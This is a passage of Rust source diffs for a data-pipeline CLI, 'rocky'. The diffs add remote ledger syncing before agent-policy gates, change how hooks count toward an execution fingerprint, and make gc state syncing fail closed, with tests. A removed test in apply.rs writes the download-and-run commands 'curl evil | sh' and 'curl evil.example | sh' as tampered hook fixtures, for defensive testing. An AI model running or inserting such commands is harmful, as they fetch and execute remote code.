+            "failed to download remote state before the agent-policy gate; a remote-backend \
+             governed apply requires the state backend reachable so a cross-pod freeze/budget \
+             decision is enforced"
+        })?;
+    Ok(())
+}
+
+/// Blocking sibling of [`sync_remote_ledger_before_gate`] for the SYNC promote
+/// gate ([`gate_promote_plan`]), which is reached from two async entry points
+/// (`rocky apply <promote>` and `rocky branch promote --plan`). Driving the
+/// download on a dedicated runtime inside the shared gate closes BOTH entry
+/// points without threading an async download through each caller.
+fn sync_remote_ledger_before_gate_blocking(config_path: &Path, state_path: &Path) -> Result<()> {
+    let Some(state_cfg) = remote_state_backend_for_gate(config_path) else {
+        return Ok(());
+    };
+    crate::commands::policy::block_on_state_sync(rocky_core::state_sync::download_state(
+        &state_cfg, state_path,
+    ))
+    .with_context(|| {
+        "failed to download remote state before the promote policy gate; a remote-backend \
+         governed promote requires the state backend reachable so a cross-pod freeze/budget \
+         decision is enforced"
+    })?;
+    Ok(())
 }
 
 /// Evaluate the agent-policy plane over a plan's touched `(model, capability)`
@@ -1673,6 +1734,11 @@ pub(crate) fn gate_promote_plan(
     promote_plan: &PromotePlan,
     state_path: &Path,
 ) -> Result<()> {
+    // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
+    // the gate reads it, so a cross-pod freeze is enforced. Placed inside the
+    // shared gate so BOTH promote entry points (`rocky apply <promote>` and
+    // `rocky branch promote --plan`) are covered. Fail-closed.
+    sync_remote_ledger_before_gate_blocking(config_path, state_path)?;
     let promote_models_dir = resolve_config_models_dir(config_path);
     let touched = touched_models_for_promote(promote_plan, &promote_models_dir);
     let gate = evaluate_apply_policy(
@@ -2014,6 +2080,9 @@ async fn run_apply_ai_authored_plan(
     };
     let touched = touched_models_for_run(&plan, &executable);
     let principal = plan.enforcement_principal(runtime_principal);
+    // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
+    // the gate reads it, so a cross-pod freeze is enforced (fail-closed).
+    sync_remote_ledger_before_gate(config_path, state_path).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -2130,6 +2199,9 @@ async fn run_apply_backfill_plan(
     // engine composed and will execute (see `execute_backfill_set` below), not
     // an informational hint — gate on it directly.
     let touched = touched_models_for_run(&plan, &run_plan.models);
+    // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
+    // the gate reads it, so a cross-pod freeze is enforced (fail-closed).
+    sync_remote_ledger_before_gate(config_path, state_path).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -5267,6 +5267,88 @@ autonomy_budget = { failures = 3, window = "7d" }
         Ok(())
     }
 
+    /// Finding 6 (round-6 false-deny fix) — the true kill-check. Hold ONLY the
+    /// writer lock (not a full `StateStore`), so `open_read_only` still succeeds
+    /// (readable snapshot) while the ledger WRITE open fails — the real
+    /// cross-process contention shape. This isolates the per-winning-rule budget
+    /// scoping (a full `StateStore` would block the reader too and hit the separate
+    /// snapshot-unreadable fail-closed). Ordinary winner + unrelated budget rule
+    /// ⇒ NOT denied; budget winner whose row can't persist ⇒ fail-closed Deny.
+    #[test]
+    fn budget_fail_closed_scoped_to_winning_rule_under_writer_lock() -> anyhow::Result<()> {
+        let dir = tempfile::tempdir()?;
+        let state = dir.path().join("state.redb");
+        // Seed the store so `open_read_only` has a readable ledger, then release.
+        drop(StateStore::open(&state)?);
+        // Hold ONLY the advisory writer lock (a separate lockfile) — readers skip it.
+        let _lock = rocky_core::state::try_acquire_writer_lock(&state)?;
+        let models = dir.path().join("models");
+        let mut touched = BTreeMap::new();
+        touched.insert("orders".to_string(), PolicyCapability::Apply);
+
+        // (a) `orders` wins under the NON-budget `any` rule; the `payments` budget
+        // rule is unrelated → must NOT fail-closed-deny despite the write-lock.
+        let cfg_a = write_config(
+            dir.path(),
+            r#"
+[[policy.rules]]
+principal = "agent"
+capability = "apply"
+scope = { models = ["payments"] }
+effect = "allow"
+autonomy_budget = { failures = 3, window = "7d" }
+
+[[policy.rules]]
+principal = "agent"
+capability = "apply"
+scope = { any = true }
+effect = "allow"
+"#,
+        )?;
+        let pol_a = rocky_core::config::load_rocky_config(&cfg_a)?.policy;
+        let gate_a = super::evaluate_apply_policy_with_policy(
+            pol_a.as_ref(),
+            "p",
+            PolicyPrincipal::Agent,
+            &touched,
+            &models,
+            &state,
+        );
+        assert!(
+            !matches!(&gate_a, PolicyGate::Deny { reason, .. } if reason.contains("fail-closed")),
+            "a NON-budget winner must not be fail-closed-denied because an unrelated budget rule \
+             exists for a different target; got {gate_a:?}"
+        );
+
+        // (b) `orders` wins under a BUDGET `any` rule whose decision row can't be
+        // persisted (write-lock held) → fail-closed Deny (durability preserved).
+        let cfg_b = write_config(
+            dir.path(),
+            r#"
+[[policy.rules]]
+principal = "agent"
+capability = "apply"
+scope = { any = true }
+effect = "allow"
+autonomy_budget = { failures = 3, window = "7d" }
+"#,
+        )?;
+        let pol_b = rocky_core::config::load_rocky_config(&cfg_b)?.policy;
+        let gate_b = super::evaluate_apply_policy_with_policy(
+            pol_b.as_ref(),
+            "p",
+            PolicyPrincipal::Agent,
+            &touched,
+            &models,
+            &state,
+        );
+        assert!(
+            matches!(&gate_b, PolicyGate::Deny { reason, .. } if reason.contains("fail-closed")),
+            "a BUDGET winner whose decision row can't be persisted must fail closed; got {gate_b:?}"
+        );
+        Ok(())
+    }
+
     /// 🔴 D (DAG) regression: a governed (agent) `--dag` apply is REFUSED,
     /// because the DAG runner dispatches sub-runs with no governance context and
     /// would execute (incl. replication) ungated. Pre-fix an agent dag apply ran

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -1400,104 +1400,27 @@ pub(crate) fn governance_policy_identity(cfg: &rocky_core::config::RockyConfig) 
     .unwrap_or_default()
 }
 
-/// The env-resolved **execution-control** identity (#1095): the on-disk `[run]`,
-/// `[reuse]`, `[resilience]`, and `[hook]`/`[hook.webhooks]` config that governs
-/// WHAT executes and WHICH side-effecting commands fire — none of which the
-/// compiled-IR projection or the routing/governance identities capture. Folded
-/// into the execution fingerprint (hashed, never compared raw — so a
-/// `[hook].env` value is never exposed) so a post-plan edit to a skip/reuse/retry
-/// toggle or a governed hook refuses at the execution choke-point.
+/// The env-resolved **execution-control** identity (#1095(a)): the on-disk
+/// `[run]`, `[reuse]`, and `[resilience]` config that governs WHAT executes and
+/// how it retries/reuses — none of which the compiled-IR projection or the
+/// routing/governance identities capture. Folded into the execution fingerprint
+/// (hashed, never compared raw), so a post-plan edit to a skip/reuse/retry toggle
+/// refuses at the execution choke-point.
 ///
-/// Shell hooks are **content-addressed**: binding only the command STRING would
-/// miss an edit to `scripts/notify.sh`'s bytes, so the first whitespace token of
-/// each command that resolves to a file under `config_dir` (or an absolute path)
-/// is blake3-hashed (an unreadable file yields a stable sentinel — fail-closed),
-/// mirroring the contract-content idiom in [`ExecutionExtras`]. Computed
-/// identically at plan time and at the apply choke-point over the SAME
-/// `config_dir`, so an unchanged project is byte-stable and never false-refuses.
-pub(crate) fn execution_control_identity(
-    cfg: &rocky_core::config::RockyConfig,
-    config_dir: &Path,
-) -> String {
-    // Sorted by event key (BTreeMap); list order preserves the parsed `[[hook]]`
-    // sequence. Each hook binds its command, delivery config, AND a content hash
-    // of any referenced local script.
-    let hooks: BTreeMap<String, serde_json::Value> = cfg
-        .hooks
-        .hooks
-        .iter()
-        .map(|(event, hook_or_list)| {
-            let entries: Vec<serde_json::Value> = hook_config_list(hook_or_list)
-                .into_iter()
-                .map(|h| {
-                    serde_json::json!({
-                        "command": h.command,
-                        "timeout_ms": h.timeout_ms,
-                        "on_failure": serde_json::to_value(&h.on_failure)
-                            .unwrap_or(serde_json::Value::Null),
-                        "env": serde_json::to_value(&h.env).unwrap_or(serde_json::Value::Null),
-                        "script": hook_script_content_hash(&h.command, config_dir),
-                    })
-                })
-                .collect();
-            (event.clone(), serde_json::Value::Array(entries))
-        })
-        .collect();
-    let webhooks: BTreeMap<String, serde_json::Value> = cfg
-        .hooks
-        .webhooks
-        .iter()
-        .map(|(event, wh)| {
-            (
-                event.clone(),
-                serde_json::to_value(wh).unwrap_or(serde_json::Value::Null),
-            )
-        })
-        .collect();
+/// `[hook]`/`[hook.webhooks]` are deliberately NOT bound here (#1095(c)). Hooks
+/// fire at pipeline-start — BEFORE the fingerprint choke-point — and a
+/// replication-only apply never reaches the gate, so binding them could not
+/// prevent a post-review hook from executing. A governed apply that configures
+/// any hook or webhook is instead REFUSED outright before any hook fires; see
+/// [`refuse_governed_side_effects`](crate::commands::run::refuse_governed_side_effects).
+pub(crate) fn execution_control_identity(cfg: &rocky_core::config::RockyConfig) -> String {
     serde_json::to_value(serde_json::json!({
         "run": serde_json::to_value(&cfg.run).unwrap_or(serde_json::Value::Null),
         "reuse": serde_json::to_value(&cfg.reuse).unwrap_or(serde_json::Value::Null),
         "resilience": serde_json::to_value(&cfg.resilience).unwrap_or(serde_json::Value::Null),
-        "hooks": hooks,
-        "webhooks": webhooks,
     }))
     .map(|v| v.to_string())
     .unwrap_or_default()
-}
-
-/// Flatten a `[hook]` event entry (single or `[[hook]]` list) to its configs.
-fn hook_config_list(
-    hook_or_list: &rocky_core::hooks::HookConfigOrList,
-) -> Vec<&rocky_core::hooks::HookConfig> {
-    match hook_or_list {
-        rocky_core::hooks::HookConfigOrList::Single(c) => vec![c],
-        rocky_core::hooks::HookConfigOrList::Multiple(v) => v.iter().collect(),
-    }
-}
-
-/// Content-address a shell hook: hash the bytes of the first command token that
-/// resolves to an existing file (relative to `config_dir` or absolute). Returns
-/// `{path, blake3}` for a resolvable script (an unreadable file → a stable
-/// sentinel, fail-closed) or `null` when the command references no local file
-/// (its command string is still bound by [`execution_control_identity`]). So an
-/// edit to a referenced script's CONTENTS — not just its command string — moves
-/// the identity and refuses a governed apply.
-fn hook_script_content_hash(command: &str, config_dir: &Path) -> serde_json::Value {
-    for token in command.split_whitespace() {
-        let candidate = if Path::new(token).is_absolute() {
-            std::path::PathBuf::from(token)
-        } else {
-            config_dir.join(token)
-        };
-        if candidate.is_file() {
-            let blake3 = match std::fs::read(&candidate) {
-                Ok(bytes) => blake3::hash(&bytes).to_hex().to_string(),
-                Err(_) => "<unreadable-hook-script>".to_string(),
-            };
-            return serde_json::json!({ "path": token, "blake3": blake3 });
-        }
-    }
-    serde_json::Value::Null
 }
 
 /// The TOCTOU check threaded to the single execution choke-point
@@ -1653,10 +1576,7 @@ impl GovernedRunContext<'_> {
             expected: self.expected_ir_fingerprint.clone(),
             config_identity: config_policy_identity(cfg),
             governance_identity: governance_policy_identity(cfg),
-            exec_control_identity: execution_control_identity(
-                cfg,
-                self.config_path.parent().unwrap_or_else(|| Path::new(".")),
-            ),
+            exec_control_identity: execution_control_identity(cfg),
             resolved_mask: cfg.resolve_mask_for_env(env),
             reviewed_source_schemas: self.reviewed_source_schemas.clone(),
             plan_id: self.plan_id.to_string(),
@@ -4344,32 +4264,29 @@ auto_create_schemas = true
         );
     }
 
-    /// #1095 closure: [`execution_control_identity`] binds `[run]`/`[reuse]`/
-    /// `[resilience]` AND content-addresses `[hook]` scripts, so a post-plan edit
-    /// to any of them moves the identity (→ the governed apply refuses at the
-    /// choke-point), while an UNCHANGED project is byte-stable (no false-refuse).
+    /// #1095(a) closure: [`execution_control_identity`] binds `[run]`/`[reuse]`/
+    /// `[resilience]`, so a post-plan edit to any of them moves the identity (→ the
+    /// governed apply refuses at the choke-point), while an UNCHANGED project is
+    /// byte-stable (no false-refuse). Hooks are enforced by REFUSAL (#1095(c)) —
+    /// see `run::refuse_governed_side_effects` — not bound here.
     #[test]
-    fn execution_control_identity_binds_config_and_content_addresses_hooks() {
+    fn execution_control_identity_binds_run_reuse_resilience() {
         let dir = tempfile::tempdir().unwrap();
-        let script = dir.path().join("notify.sh");
-        std::fs::write(&script, b"#!/bin/sh\necho reviewed\n").unwrap();
-        let root = dir.path();
         let load = |body: &str| -> rocky_core::config::RockyConfig {
-            let p = root.join("rocky.toml");
+            let p = dir.path().join("rocky.toml");
             std::fs::write(&p, body).unwrap();
             rocky_core::config::load_rocky_config(&p).unwrap()
         };
         let base_toml = "[adapter]\ntype = \"duckdb\"\npath = \"x.duckdb\"\n\n\
             [pipeline.p]\ntype = \"transformation\"\nmodels = \"models/**\"\n\n\
             [pipeline.p.target]\nadapter = \"default\"\n\n\
-            [run]\nskip_unchanged = false\n\n\
-            [hook.on_pipeline_start]\ncommand = \"notify.sh\"\n";
-        let base = super::execution_control_identity(&load(base_toml), root);
+            [run]\nskip_unchanged = false\n";
+        let base = super::execution_control_identity(&load(base_toml));
 
-        // Unchanged config + unchanged script → byte-stable (no false-refuse).
+        // Unchanged config → byte-stable (no false-refuse).
         assert_eq!(
             base,
-            super::execution_control_identity(&load(base_toml), root),
+            super::execution_control_identity(&load(base_toml)),
             "an unchanged project must produce a stable execution-control identity"
         );
 
@@ -4378,7 +4295,7 @@ auto_create_schemas = true
         let skip = base_toml.replace("skip_unchanged = false", "skip_unchanged = true");
         assert_ne!(
             base,
-            super::execution_control_identity(&load(&skip), root),
+            super::execution_control_identity(&load(&skip)),
             "a [run].skip_unchanged flip must move the identity"
         );
 
@@ -4386,7 +4303,7 @@ auto_create_schemas = true
         let reuse = format!("{base_toml}\n[reuse]\nenabled = true\n");
         assert_ne!(
             base,
-            super::execution_control_identity(&load(&reuse), root),
+            super::execution_control_identity(&load(&reuse)),
             "a [reuse] toggle must move the identity"
         );
 
@@ -4394,26 +4311,8 @@ auto_create_schemas = true
         let resil = format!("{base_toml}\n[resilience]\ntransient_max_retries = 9\n");
         assert_ne!(
             base,
-            super::execution_control_identity(&load(&resil), root),
+            super::execution_control_identity(&load(&resil)),
             "a [resilience] change must move the identity"
-        );
-
-        // (d) hook COMMAND edit → moves (the classic post-review arbitrary command).
-        let cmd = base_toml.replace("command = \"notify.sh\"", "command = \"curl evil | sh\"");
-        assert_ne!(
-            base,
-            super::execution_control_identity(&load(&cmd), root),
-            "a [hook] command edit must move the identity"
-        );
-
-        // (e) referenced SCRIPT CONTENTS edit, command string UNCHANGED → moves.
-        // Binding only the command string would miss this — content-addressing
-        // (blake3 of the script bytes) catches it. This is the #1095(c) core.
-        std::fs::write(&script, b"#!/bin/sh\ncurl evil.example | sh\n").unwrap();
-        assert_ne!(
-            base,
-            super::execution_control_identity(&load(base_toml), root),
-            "editing a hook's referenced script CONTENTS must move the identity"
         );
     }
 

--- a/engine/crates/rocky-cli/src/commands/backfill.rs
+++ b/engine/crates/rocky-cli/src/commands/backfill.rs
@@ -225,19 +225,12 @@ pub(crate) fn run_backfill_in(
         .as_ref()
         .map(crate::commands::apply::governance_policy_identity)
         .unwrap_or_default();
-    // Execution-control identity (#1095): `[run]`/`[reuse]`/`[resilience]` +
-    // content-addressed `[hook]` set, over the config's own directory so it is
-    // symmetric with the apply choke-point.
+    // Execution-control identity (#1095(a)): `[run]`/`[reuse]`/`[resilience]`,
+    // symmetric with the apply choke-point. (Hooks are refused under a governed
+    // apply, #1095(c), not bound here.)
     let exec_control_identity = backfill_cfg
         .as_ref()
-        .map(|c| {
-            crate::commands::apply::execution_control_identity(
-                c,
-                config_path
-                    .parent()
-                    .unwrap_or_else(|| std::path::Path::new(".")),
-            )
-        })
+        .map(crate::commands::apply::execution_control_identity)
         .unwrap_or_default();
     // Finding #4: a backfill is selection-scoped (`model_set`) and reconciles
     // ONLY tags, never masks (run.rs `execute_backfill_set` → tags), so the mask

--- a/engine/crates/rocky-cli/src/commands/backfill.rs
+++ b/engine/crates/rocky-cli/src/commands/backfill.rs
@@ -225,6 +225,20 @@ pub(crate) fn run_backfill_in(
         .as_ref()
         .map(crate::commands::apply::governance_policy_identity)
         .unwrap_or_default();
+    // Execution-control identity (#1095): `[run]`/`[reuse]`/`[resilience]` +
+    // content-addressed `[hook]` set, over the config's own directory so it is
+    // symmetric with the apply choke-point.
+    let exec_control_identity = backfill_cfg
+        .as_ref()
+        .map(|c| {
+            crate::commands::apply::execution_control_identity(
+                c,
+                config_path
+                    .parent()
+                    .unwrap_or_else(|| std::path::Path::new(".")),
+            )
+        })
+        .unwrap_or_default();
     // Finding #4: a backfill is selection-scoped (`model_set`) and reconciles
     // ONLY tags, never masks (run.rs `execute_backfill_set` → tags), so the mask
     // is NOT bound — matching the apply choke-point, which sees `model_set` and
@@ -267,6 +281,7 @@ pub(crate) fn run_backfill_in(
             &compiled.project.models,
             &identity,
             &governance_identity,
+            &exec_control_identity,
             &extras,
         ),
         config_identity,

--- a/engine/crates/rocky-cli/src/commands/gc.rs
+++ b/engine/crates/rocky-cli/src/commands/gc.rs
@@ -66,7 +66,8 @@ use chrono::{DateTime, Utc};
 use tracing::warn;
 
 use rocky_core::config::{
-    ConfigError, PolicyCapability, PolicyPrincipal, StateBackend, load_rocky_config,
+    ConfigError, PolicyCapability, PolicyPrincipal, StateBackend, StateConfig,
+    StateUploadFailureMode, load_rocky_config,
 };
 use rocky_core::cost::{WarehouseType, compute_observed_cost_usd, warehouse_size_to_dbu_per_hour};
 use rocky_core::state::{
@@ -1497,6 +1498,43 @@ pub(crate) async fn run_gc_apply_in_with(
         .map(|e| (e.model_name.clone(), PolicyCapability::Gc))
         .collect();
     let models_dir = gc_models_dir(loaded_cfg.as_ref(), config_path);
+
+    // SEAM-SCOPED SYNC (S1, #1089) — download half, BEFORE the policy gate.
+    // Two ledgers matter here and both are among the tables `rocky run`
+    // wholesale downloads-at-start / uploads-at-end when `[state]` is remote:
+    //   1. POLICY_DECISIONS — the freeze/budget ledger `evaluate_apply_policy`
+    //      reads. A freeze uploaded by another pod is invisible unless we pull
+    //      the authoritative remote ledger FIRST (finding 4-GC); otherwise the
+    //      gate would clear against a stale local snapshot and gc would proceed
+    //      through an active cross-pod freeze.
+    //   2. TOMBSTONES — the eviction ledger `execute_gc_apply` writes; left
+    //      unsynced an eviction would be silently reverted by the next run's
+    //      start-download.
+    // So when the backend is remote we download the authoritative remote state
+    // (overwriting the local file, preserving the local-only tables) BEFORE the
+    // policy gate reads it and before we tombstone on top of it, then upload
+    // AFTER the commit. A remote-backend `gc apply` therefore requires the
+    // backend reachable; a download failure aborts before gating or evicting.
+    //
+    // KNOWN LIMITATION (concurrency): this closes only the *sequential*
+    // between-runs clobber. The remote state object is a whole-file blob with no
+    // compare-and-swap, so a concurrent writer (e.g. a `rocky run` whose
+    // start-download preceded this apply) can still overwrite these tombstones on
+    // its end-upload — a cross-pod lost update. Concurrency is NOT handled here.
+    let state_cfg = loaded_cfg
+        .as_ref()
+        .map(|cfg| cfg.state.clone())
+        .unwrap_or_default();
+    let remote_state = !matches!(state_cfg.backend, StateBackend::Local);
+    if remote_state {
+        rocky_core::state_sync::download_state(&state_cfg, state_path)
+            .await
+            .with_context(|| {
+                "failed to download remote state before gc apply; a remote-backend gc apply \
+                 requires the state backend to be reachable"
+            })?;
+    }
+
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -1550,43 +1588,24 @@ pub(crate) async fn run_gc_apply_in_with(
         );
     }
 
-    // SEAM-SCOPED SYNC (S1, #1089). The TOMBSTONES ledger `execute_gc_apply`
-    // writes is one of the tables `rocky run` wholesale downloads-at-start and
-    // uploads-at-end when `[state]` is remote. Left unsynced, an eviction
-    // recorded here would be silently reverted by the next run's start-download.
-    // So when the backend is remote we bracket the write: download the
-    // authoritative remote ledger BEFORE opening the store (overwriting the
-    // local file, so we tombstone on top of it), then upload AFTER the commit.
-    // A remote-backend `gc apply` therefore requires the backend reachable; a
-    // download failure aborts before evicting anything.
-    //
-    // KNOWN LIMITATION (concurrency): this closes only the *sequential*
-    // between-runs clobber. The remote state object is a whole-file blob with no
-    // compare-and-swap, so a concurrent writer (e.g. a `rocky run` whose
-    // start-download preceded this apply) can still overwrite these tombstones on
-    // its end-upload — a cross-pod lost update. Concurrency is NOT handled here.
-    let state_cfg = loaded_cfg
-        .as_ref()
-        .map(|cfg| cfg.state.clone())
-        .unwrap_or_default();
-    let remote_state = !matches!(state_cfg.backend, StateBackend::Local);
-    if remote_state {
-        rocky_core::state_sync::download_state(&state_cfg, state_path)
-            .await
-            .with_context(|| {
-                "failed to download remote state before gc apply; a remote-backend gc apply \
-                 requires the state backend to be reachable"
-            })?;
-    }
-
     let store = StateStore::open(state_path)
         .with_context(|| format!("failed to open state store at {}", state_path.display()))?;
     let output = execute_gc_apply(&store, oracle, plan_id, &plan, Utc::now()).await?;
     // Drop the store to release the advisory lock / flush the file before upload.
     drop(store);
 
+    // SEAM-SCOPED SYNC — upload half, FAIL-CLOSED. Durability is the whole point
+    // of the seam: an eviction that commits locally but never reaches the remote
+    // would be silently reverted by the next run's start-download while this
+    // command reported success. So the upload is forced to `Fail` regardless of
+    // the configured `on_upload_failure` (default `skip`) — a failed upload
+    // aborts (finding 5).
     if remote_state {
-        rocky_core::state_sync::upload_state(&state_cfg, state_path)
+        let upload_cfg = StateConfig {
+            on_upload_failure: StateUploadFailureMode::Fail,
+            ..state_cfg.clone()
+        };
+        rocky_core::state_sync::upload_state(&upload_cfg, state_path)
             .await
             .with_context(|| "failed to upload remote state after gc apply")?;
     }

--- a/engine/crates/rocky-cli/src/commands/gc.rs
+++ b/engine/crates/rocky-cli/src/commands/gc.rs
@@ -65,7 +65,9 @@ use async_trait::async_trait;
 use chrono::{DateTime, Utc};
 use tracing::warn;
 
-use rocky_core::config::{ConfigError, PolicyCapability, PolicyPrincipal, load_rocky_config};
+use rocky_core::config::{
+    ConfigError, PolicyCapability, PolicyPrincipal, StateBackend, load_rocky_config,
+};
 use rocky_core::cost::{WarehouseType, compute_observed_cost_usd, warehouse_size_to_dbu_per_hour};
 use rocky_core::state::{
     ArtifactRecord, EvictOutcome, ModelExecution, ProvenanceRecord, RunRecord, StateStore,
@@ -1548,9 +1550,46 @@ pub(crate) async fn run_gc_apply_in_with(
         );
     }
 
+    // SEAM-SCOPED SYNC (S1, #1089). The TOMBSTONES ledger `execute_gc_apply`
+    // writes is one of the tables `rocky run` wholesale downloads-at-start and
+    // uploads-at-end when `[state]` is remote. Left unsynced, an eviction
+    // recorded here would be silently reverted by the next run's start-download.
+    // So when the backend is remote we bracket the write: download the
+    // authoritative remote ledger BEFORE opening the store (overwriting the
+    // local file, so we tombstone on top of it), then upload AFTER the commit.
+    // A remote-backend `gc apply` therefore requires the backend reachable; a
+    // download failure aborts before evicting anything.
+    //
+    // KNOWN LIMITATION (concurrency): this closes only the *sequential*
+    // between-runs clobber. The remote state object is a whole-file blob with no
+    // compare-and-swap, so a concurrent writer (e.g. a `rocky run` whose
+    // start-download preceded this apply) can still overwrite these tombstones on
+    // its end-upload — a cross-pod lost update. Concurrency is NOT handled here.
+    let state_cfg = loaded_cfg
+        .as_ref()
+        .map(|cfg| cfg.state.clone())
+        .unwrap_or_default();
+    let remote_state = !matches!(state_cfg.backend, StateBackend::Local);
+    if remote_state {
+        rocky_core::state_sync::download_state(&state_cfg, state_path)
+            .await
+            .with_context(|| {
+                "failed to download remote state before gc apply; a remote-backend gc apply \
+                 requires the state backend to be reachable"
+            })?;
+    }
+
     let store = StateStore::open(state_path)
         .with_context(|| format!("failed to open state store at {}", state_path.display()))?;
     let output = execute_gc_apply(&store, oracle, plan_id, &plan, Utc::now()).await?;
+    // Drop the store to release the advisory lock / flush the file before upload.
+    drop(store);
+
+    if remote_state {
+        rocky_core::state_sync::upload_state(&state_cfg, state_path)
+            .await
+            .with_context(|| "failed to upload remote state after gc apply")?;
+    }
 
     if json {
         println!("{}", serde_json::to_string_pretty(&output)?);
@@ -2663,6 +2702,62 @@ auto_create_schemas = true
         let store = StateStore::open(&state_path).unwrap();
         assert_eq!(store.list_tombstones().unwrap().len(), 1);
         assert_eq!(store.refcount_for_hash(HA).unwrap(), 0);
+    }
+
+    /// S1 (#1089): with a REMOTE `[state]` backend, `gc apply` brackets the
+    /// TOMBSTONES write with a seam-scoped sync whose **download-before-open**
+    /// half runs first. A deliberately-misconfigured remote backend (`s3`, no
+    /// bucket) makes that download fail fast with `MissingConfig`, aborting the
+    /// apply BEFORE any eviction. Proves the download-before half is wired and
+    /// fatal (and that no tombstone leaks past a failed sync); without it, the
+    /// eviction would proceed and be reverted by the next run's start-download.
+    #[tokio::test]
+    async fn gc_apply_downloads_remote_state_before_evicting() {
+        let dir = TempDir::new().unwrap();
+        let state_path = dir.path().join("state.redb");
+        let plan_id = {
+            let store = StateStore::open(&state_path).unwrap();
+            let old = Utc::now() - Duration::days(30);
+            seed(&store, "r1", "orders", "SELECT 1 AS id", &[], HA, 500, old);
+            record_run(&store, "r1", "orders");
+            let plan = plan_from_store(&store, Utc::now(), 7);
+            write_plan_with_principal(dir.path(), PlanKind::Gc, &plan, PolicyPrincipal::Human)
+                .unwrap()
+        };
+
+        // A rocky.toml with a REMOTE [state] backend, deliberately missing its
+        // bucket so the download-before step fails fast with MissingConfig.
+        let config = dir.path().join("rocky.toml");
+        std::fs::write(&config, "[state]\nbackend = \"s3\"\n").unwrap();
+
+        // Satisfy the unconditional review gate so we reach the sync seam.
+        let marker = crate::commands::apply::review_marker_path(dir.path(), &plan_id);
+        std::fs::create_dir_all(marker.parent().unwrap()).unwrap();
+        std::fs::write(&marker, "{}").unwrap();
+
+        let oracle = FixedLivenessOracle::reclaimable();
+        let err = run_gc_apply_in_with(
+            dir.path(),
+            &config,
+            &plan_id,
+            &state_path,
+            PolicyPrincipal::Human,
+            true,
+            &oracle,
+        )
+        .await
+        .expect_err("a remote-backend gc apply must abort when the state backend is unreachable");
+        assert!(
+            err.to_string().contains("download remote state"),
+            "download-before-open must be wired and fatal: {err}"
+        );
+
+        // Nothing evicted — the download-before aborted before the store write.
+        let store = StateStore::open(&state_path).unwrap();
+        assert!(
+            store.list_tombstones().unwrap().is_empty(),
+            "no tombstone should be written when the download-before-open aborts"
+        );
     }
 
     /// 🔴 DEFECT 1 (append-only data loss). The UniForm/Delta writer is

--- a/engine/crates/rocky-cli/src/commands/gc.rs
+++ b/engine/crates/rocky-cli/src/commands/gc.rs
@@ -66,8 +66,8 @@ use chrono::{DateTime, Utc};
 use tracing::warn;
 
 use rocky_core::config::{
-    ConfigError, PolicyCapability, PolicyPrincipal, StateBackend, StateConfig,
-    StateUploadFailureMode, load_rocky_config,
+    PolicyCapability, PolicyPrincipal, StateBackend, StateConfig, StateUploadFailureMode,
+    load_rocky_config,
 };
 use rocky_core::cost::{WarehouseType, compute_observed_cost_usd, warehouse_size_to_dbu_per_hour};
 use rocky_core::state::{
@@ -75,7 +75,7 @@ use rocky_core::state::{
     TombstoneRecord,
 };
 
-use crate::commands::apply::{PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy};
+use crate::commands::apply::{PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy_with_policy};
 use crate::commands::replay::classify_model;
 use crate::commands::review::record_plan_review_escalation;
 use crate::output::{
@@ -1535,8 +1535,12 @@ pub(crate) async fn run_gc_apply_in_with(
             })?;
     }
 
-    let gate = evaluate_apply_policy(
-        config_path,
+    // Finding 1: gate on the SAME `loaded_cfg` snapshot used for the state
+    // backend + models-dir above, rather than reloading the config inside
+    // `evaluate_apply_policy` — a `rocky.toml` swap between the loads must not let
+    // the state-backend/download and the policy gate disagree.
+    let gate = evaluate_apply_policy_with_policy(
+        loaded_cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
         plan_record.enforcement_principal(runtime_principal),
         &touched,
@@ -1568,16 +1572,15 @@ pub(crate) async fn run_gc_apply_in_with(
     // typo alongside `physical_delete = true` — a missing env var, a validation
     // failure) is propagated (fail loud): a misconfigured `physical_delete`
     // must never silently degrade into "tombstone + retire" (finding 3).
-    let physical_delete = match load_rocky_config(config_path) {
-        Ok(cfg) => cfg.gc.physical_delete,
-        Err(ConfigError::FileNotFound { .. }) => false,
-        Err(e) => {
-            return Err(anyhow::Error::new(e).context(
-                "failed to load config to resolve `[gc] physical_delete` — refusing to apply a \
-                 gc plan against an unreadable/malformed config (fail-closed)",
-            ));
-        }
-    };
+    //
+    // Finding 1: resolved from the SAME `loaded_cfg` snapshot loaded above — a
+    // genuine (non-FileNotFound) config error already bailed there, so `None`
+    // here is exactly the absent-config case → `physical_delete = false`. No
+    // second `load_rocky_config` that a `rocky.toml` swap could point elsewhere.
+    let physical_delete = loaded_cfg
+        .as_ref()
+        .map(|cfg| cfg.gc.physical_delete)
+        .unwrap_or(false);
     if physical_delete {
         bail!(
             "`[gc] physical_delete = true` is not supported: physical reclamation of \

--- a/engine/crates/rocky-cli/src/commands/mod.rs
+++ b/engine/crates/rocky-cli/src/commands/mod.rs
@@ -88,7 +88,10 @@ pub use ai::{
     SchemaBuckets, build_schema_context, run_ai, run_ai_explain, run_ai_sync, run_ai_test,
 };
 pub use ai_contract::run_ai_contract;
-pub use apply::{PolicyGate, evaluate_apply_policy, run_apply, run_apply_inline_for_run};
+pub use apply::{
+    PolicyGate, evaluate_apply_policy, evaluate_apply_policy_with_policy, run_apply,
+    run_apply_inline_for_run,
+};
 pub use archive::{run_archive, run_archive_apply, run_archive_catalog};
 pub use audit::{
     compute_audit_for, compute_audit_scorecard, run_audit, run_audit_for, run_audit_scorecard,

--- a/engine/crates/rocky-cli/src/commands/plan.rs
+++ b/engine/crates/rocky-cli/src/commands/plan.rs
@@ -1027,19 +1027,12 @@ pub fn compute_embedded_capabilities(
         .as_ref()
         .map(crate::commands::apply::governance_policy_identity)
         .unwrap_or_default();
-    // Execution-control identity (#1095): `[run]`/`[reuse]`/`[resilience]` +
-    // content-addressed `[hook]` set, resolved over the config's own directory so
-    // plan and apply hash the SAME referenced scripts for an unchanged project.
